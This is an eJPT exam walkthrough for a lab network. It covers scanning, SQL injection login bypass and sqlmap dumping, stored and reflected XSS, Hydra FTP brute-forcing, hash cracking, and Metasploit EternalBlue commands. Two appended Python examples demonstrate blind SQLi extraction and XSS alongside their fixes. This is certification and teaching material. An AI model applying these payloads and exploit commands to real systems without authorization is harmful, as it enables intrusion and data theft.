2/28/22, 7:58 PM   eJPT Exam Walkthrough/Writeup - Evernote

eJPT Exam Walkthrough/Writeup

Report - Methodologies

3.1 Report - Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the exam network. The given host target was:

    192.168.193.211

    ./nmapAutomator.sh --host 192.168.193.211 -t network

Apart from the attacker machine, nmapAutomator found three other nodes (hosts): 192.168.193.212, 192.168.193.85 and 192.168.193.4. An FTP server can also be found at 192.168.193.14.

Among the given materials there is a PCAP file, which was opened and analysed:

    [screenshot: the PCAP opened in a packet analyser]

3.2 Report - Service Enumeration

Summary of open ports for each network host:

192.168.193.211

    Not shown: 997 closed tcp ports (reset)
    [screenshot: nmap output listing the three open TCP ports on 192.168.193.211 with their services and versions]

192.168.193.212 has the same open ports and running services, while 192.168.193.4 only has FTP open.

I further checked both 192.168.193.2xx machines (.211 and .212) with SMB enumeration, which pointed out two users, jessica and kirk, as well as the shares present on those machines:

    [screenshot: SMB enumeration output showing the users and shares]

Going back to analysing the given PCAP file, it seems that once we request port 80 on a network machine we are redirected to 10.86.74.7. To reproduce this environment's behaviour from our attacker machine, a static route to that subnet was added via 192.168.193.4 and verified with traceroute:

    sudo ip route add 10.86.74.0/24 via 192.168.193.4 && traceroute 10.86.74.7

The route can be dropped and re-added with:

    sudo ip route flush 10.86.74.0/24
    sudo ip route add 10.86.74.0/24 via 192.168.193.4 && traceroute 10.86.74.7

The same can be done for 10.85.174.0/24.

Browsing to 10.86.74.7 shows the Motville website:

    [screenshot: Motville home page with the Contact Us and Latest Albums sections]

On the Contact page we can see details about Mick Hughes and other employees, such as their nicknames and roles. As this is a web service, dirb was used for directory enumeration:

    dirb http://10.86.74.7 /usr/share/wordlists/dirb/common.txt

Among the results we find the old configuration for the backend databases and other files:

    [screenshot: dirb output]

3.3 Report - Penetration

Vulnerability Exploited: Blind SQLi login bypass
- Explanation: the Motville login page is vulnerable to a blind SQL injection login bypass.
- Severity: High
- PoC:
    [screenshot: "Welcome" page shown after the bypass]
- Steps to exploit: use ' or 1=1-- - as both the username and the password.

Vulnerability Exploited: Stored XSS
- Explanation: the Motville Contact page is vulnerable to stored Cross-Site Scripting (XSS).
- Severity: Medium
- PoC:
    [screenshot: alert fired on the Contact Us page]
- Steps to exploit: issue a POST request to the Contact form with the name field set to an XSS alert inside a script tag. Because the name is stored, the alert fires for every later visitor of the page, not only for the attacker.

Vulnerability Exploited: Reflected XSS
- Explanation: the Motville search parameter/box is vulnerable to reflected Cross-Site Scripting (XSS).
- Severity: Medium
- PoC:
    [screenshot: alert fired from the search results page]
- Steps to exploit: issue a GET request with the search parameter set to an XSS alert inside a script tag.

Running the Nessus Essentials scanner against the same host revealed a second GET-exploitable XSS.

Given the materials, we can use Hydra with the supplied userlist and passwordlist files to brute-force the FTP root password and further enumerate the files on the server. The credentials are root:metallica.

    [screenshot: Hydra run and FTP file listing]

The password hashes obtained were then cracked with John the Ripper:

    [screenshot: issued john command and its output, "Loaded 13 password hashes with 13 different salts (sha512crypt, crypt(3) $6$ [...])", session completed with the cracked passwords listed per user]

Coming back to Motville, sqlmap was used to discover and dump the database account details. The iterative process (enumerating databases, then tables, then columns) led to the "accounts" table of the "motville" database, which sqlmap stores in a .csv file for later use. Issued command:

    sqlmap -u http://10.86.74.7 -D motville -T accounts --columns

Note that --columns only lists the table's columns; the .csv is written by the final --dump step against the same table. When completed, the resulting output can be found under sqlmap's output directory, whose path is printed at the end of the run.

Further, nmapAutomator was used for a complete scan of both machines running SMB:

    ./nmapAutomator.sh --host 192.168.193.211 -t full
    ./nmapAutomator.sh --host 192.168.193.212 -t full

Both machines (.211 and .212) are vulnerable to EternalBlue (MS17-010). This can be confirmed before exploitation with nmap's smb-vuln-ms17-010 script or Metasploit's auxiliary/scanner/smb/smb_ms17_010 module. The Metasploit console is helpful in getting privileged access through this vulnerability:

    msfconsole -q
    > use exploit/windows/smb/ms17_010_psexec
    > set RHOSTS 192.168.193.211      (or 192.168.193.212 for the second machine)
    > set LHOST tap
    > run

One of the machines hides a file containing a flag, C:\WINDOWS\secret.txt.
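The login bypass and the sqlmap dump described in the Penetration section above are two uses of the same boolean-based blind injection: the login page answers only "logged in" or "not logged in", and that single bit is enough to both bypass the check and read the accounts table one character at a time. The following is an added example, not code from the writeup or from the Motville application: a constructed in-memory SQLite table (`SAMPLE_ACCOUNTS`, hypothetical values) stands in for the backend, `vulnerable_login()` stands in for the real login handler, and `safe_login()` shows the parameterised query that closes the hole.

```python
"""Blind SQL injection: login bypass, boolean-based extraction, and the fix.

Added example, not part of the original writeup. The table contents and the
login handlers are constructed stand-ins for the Motville backend.
"""
import sqlite3
import string

# Constructed sample data; the real accounts table layout is unknown.
SAMPLE_ACCOUNTS = [
    ("admin", "s3cretP@ss"),
    ("mick", "hughes2021"),
]

# The writeup's bypass string: closes the username literal, makes the WHERE
# clause always true, and comments out the password check.
BYPASS = "' or 1=1-- -"


def build_db():
    """In-memory SQLite database playing the role of the 'motville' database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return db


def vulnerable_login(db, username, password):
    """Login handler that concatenates user input into SQL (the bug).
    Returns only True/False: that one bit is the attacker's whole oracle."""
    query = ("SELECT username FROM accounts WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return db.execute(query).fetchone() is not None


def safe_login(db, username, password):
    """Same check with bound parameters: the input can never alter the query."""
    row = db.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def blind_extract(oracle, column, row_index, max_len=32):
    """Recover accounts.<column> of one row using only the login oracle.

    Each probe asks "is character <pos> of the value equal to <ch>?" and the
    login succeeding means yes. This is the boolean-based technique sqlmap
    automates when it dumps a table through a blind injection point.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            ch_sql = ch.replace("'", "''")        # keep the probe valid SQL
            probe = ("' or substr((SELECT %s FROM accounts ORDER BY rowid "
                     "LIMIT 1 OFFSET %d),%d,1)='%s'-- -"
                     % (column, row_index, pos, ch_sql))
            if oracle(probe, "x"):               # password value is irrelevant
                found += ch
                break
        else:
            break        # no character matched: end of the value
    return found


if __name__ == "__main__":
    db = build_db()
    oracle = lambda u, p: vulnerable_login(db, u, p)
    print("bypass on vulnerable handler:", vulnerable_login(db, BYPASS, "x"))
    print("bypass on fixed handler:     ", safe_login(db, BYPASS, "x"))
    print("extracted admin password:    ", blind_extract(oracle, "password", 0))
```

The probe shape mirrors the PoC from the report: the same `' ... -- -` framing, with `1=1` replaced by a `substr()` comparison, so every request that sqlmap sends during `--dump` is just a variation of the bypass that was confirmed by hand first.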

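The stored and reflected XSS findings on the Contact page and the search box differ only in where the unescaped input comes from: a stored value is rendered for every later visitor, a reflected one only in the response to the request that carried it. The following is an added example, not code from the writeup or from the Motville site: `ContactPage` and `search_page()` are hypothetical stand-ins for the two handlers, each with an unfixed and an output-encoded variant, and `reflects_unescaped()` is the canary check a tester runs before reaching for an alert payload.

```python
"""Stored vs reflected XSS, the output-encoding fix, and a canary check.

Added example, not part of the original writeup. The handlers are
constructed stand-ins for the Contact form and the search box.
"""
import html

PAYLOAD = "<script>alert(1)</script>"   # the alert-in-script-tag probe from the report
CANARY = 'x"<>\'y'                      # HTML metacharacters that must come back encoded


class ContactPage:
    """Contact form: the submitted name is stored and shown to every later visitor."""

    def __init__(self, escape_output):
        self.names = []
        self.escape_output = escape_output

    def post_name(self, name):
        """POST /contact (constructed): store the name as submitted."""
        self.names.append(name)

    def render(self):
        """GET /contact for any visitor: every stored name lands in the HTML."""
        items = [html.escape(n, quote=True) if self.escape_output else n
                 for n in self.names]
        return "<ul>" + "".join("<li>%s</li>" % n for n in items) + "</ul>"


def search_page(q, escape_output):
    """Search box: the GET parameter is echoed only into this one response."""
    shown = html.escape(q, quote=True) if escape_output else q
    # Both an attribute context and a text context; quote=True covers both.
    return '<input name="q" value="%s"><p>Results for %s</p>' % (shown, shown)


def reflects_unescaped(body, canary=CANARY):
    """Canary check: a raw '<', '>', '"' or "'" coming back intact means the
    parameter reaches the HTML without encoding for that context."""
    return canary in body


def demo():
    """Run the probe against all four handler variants; True means exploitable."""
    results = {}
    for fixed in (False, True):
        page = ContactPage(escape_output=fixed)
        page.post_name("Mick")        # a legitimate earlier submission
        page.post_name(PAYLOAD)       # the attacker's POST
        results[("stored", fixed)] = PAYLOAD in page.render()     # a later victim's GET
        results[("reflected", fixed)] = PAYLOAD in search_page(PAYLOAD, fixed)
    return results


if __name__ == "__main__":
    for (kind, fixed), exploitable in demo().items():
        print("%-9s fixed=%-5s exploitable=%s" % (kind, fixed, exploitable))
```

`html.escape(..., quote=True)` is the minimal repair for values that land in HTML text or a quoted attribute; a parameter that ends up inside a script block or a URL needs a different encoder, which is why the canary check is run per injection point rather than once per page.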